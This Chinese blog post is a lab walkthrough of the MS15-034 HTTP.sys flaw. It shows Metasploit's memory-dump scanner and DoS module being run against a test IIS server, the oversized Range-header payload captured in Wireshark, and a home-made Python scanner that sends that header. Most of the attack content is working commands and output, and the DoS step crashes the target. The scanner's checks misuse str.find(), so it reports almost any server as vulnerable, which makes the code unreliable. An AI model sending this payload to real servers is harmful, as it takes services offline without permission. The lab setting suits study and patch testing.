ms15-034的的漏洞利用,及使用爬虫编写扫描器
程序员文章站
2024-03-18 10:55:34
...
ms15-034一个高危漏洞
根据微软官方公告来看,受影响的系统还是挺多的,那么本次就记录这个漏洞的学习过程吧
从官方的公告可以得知产生原因 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中, 当 HTTP.sys未正确分析经特殊设计的 HTTP 请求时会导致 此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
也就说明通过特殊构造的poc就可以触发漏洞
使用windows server2008R2 搭建本次学习需要的环境
-
打开服务器管理器,添加角色
-
选择web服务器
-
这里可以看一下介绍是用来干嘛的,然后下一步
-
这里勾选http重定向,以及管理工具所有的选项,下一步
-
确认功能无误,开始安装
-
安装成功之后关闭,使用另一台win7虚拟机访问该服务器的地址
搭建完成后打开msf 检测一下漏洞是否存在,run的时候在后台打开wireshare抓包
> search ms15-034
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/http/ms15_034_ulonglongadd normal Yes MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
1 auxiliary/scanner/http/ms15_034_http_sys_memory_dump normal Yes MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure
msf5 > use 1
msf5 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > show options
Module options (auxiliary/scanner/http/ms15_034_http_sys_memory_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SUPPRESS_REQUEST true yes Suppress output of the requested resource
TARGETURI / no URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > set rhosts 192.168.3.51
rhosts => 192.168.3.51
msf5 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > run
[+] Target may be vulnerable...
[+] Stand by...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
一执行,马上就显示出来目标好像存在漏洞,打开wireshare,筛选栏
http and ip.dst eq 192.168.3.51
可以看到msf发送了一个自己构造的http请求,其中自定义了一个非法的头部信息 追踪http流拿到payload Range:bytes=0-18446744073709551615
开始编写自己的扫描器。 具体思路为用python requests库来提交自己构造的http访问
import requests
import sys
url = "http://"+sys.argv[1]
r = requests.get(url)
remote_server = r.headers['Server']
if remote_server.find("IIS/7.5") or remote_server.find("IIS/8.0"):
payload = {"Host":"stuff","Range":"bytes=0-18446744073709551615"}
r1 = requests.get(url,headers=payload)
print (r1.request.headers) #输出自定义的头部信息
if str(r1.content).find("Requested Range Not Satisfiable"):
print (url + '--' + "vnlu is exist" )
else:
print ("ms05-034 is not exist")
else:
print (url + '--' + "server not a iis/7.5 or iis/8.0 ")
运行效果
aaa@qq.com:~/python/test# python3 ms15_034.py 192.168.3.51
{'User-Agent': 'python-requests/2.22.0', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive', 'Host': 'stuff', 'Range': 'bytes=0-18446744073709551615'}
http://192.168.3.51--vnlu is exist
aaa@qq.com:~/python/test#
漏洞存在的话就可以利用一下,记得不错的话好像msf有这个模块的
msf5 > search ms15-034 #搜索ms15-034相关模块
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/http/ms15_034_ulonglongadd normal Yes MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
1 auxiliary/scanner/http/ms15_034_http_sys_memory_dump normal Yes MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure
msf5 > use 0 #选择搜索出来的第一个利用模块
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > show options #查看需要设置的参数
Module options (auxiliary/dos/http/ms15_034_ulonglongadd):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / no URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.3.51 #设置目标
rhosts => 192.168.3.51
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > run
[*] DOS request sent
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
这刚摁下去就直接凉凉了
声明:本文仅供学习,请勿用作非法用途。
上一篇: ES6新特性
下一篇: RabbitMQ入门